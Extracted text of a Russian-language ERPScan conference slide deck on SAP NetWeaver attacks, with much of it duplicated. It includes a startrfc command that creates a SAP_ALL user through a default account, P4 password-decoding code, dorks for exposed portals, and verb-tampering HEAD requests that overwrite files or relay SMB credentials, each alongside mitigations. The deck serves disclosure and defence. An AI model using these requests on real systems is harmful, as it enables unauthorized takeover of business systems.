Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Поговорим о безопасности
bull Что мы знаем о SAPbull Проблемы ответственности и контроляbull Примеры обхода SODbull Уязвимости ABAP движка из интернетbull Уязвимости J2EE движка из интернетbull Взломать SAP за 60 секунд демо
erpscancom 7ERPScan mdash invest in security to secure investments
Что мы знаем о SAP
Вставьте рисунок на слайд скруглите верхний левый и нижний правый угол (Формат ndash Формат рисунка) добавьте контур (оранжевый толщина ndash 3)
erpscancom 8ERPScan mdash invest in security to secure investments
Shut up
And
Pay
SAP Who cares
erpscancom 9ERPScan mdash invest in security to secure investments
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
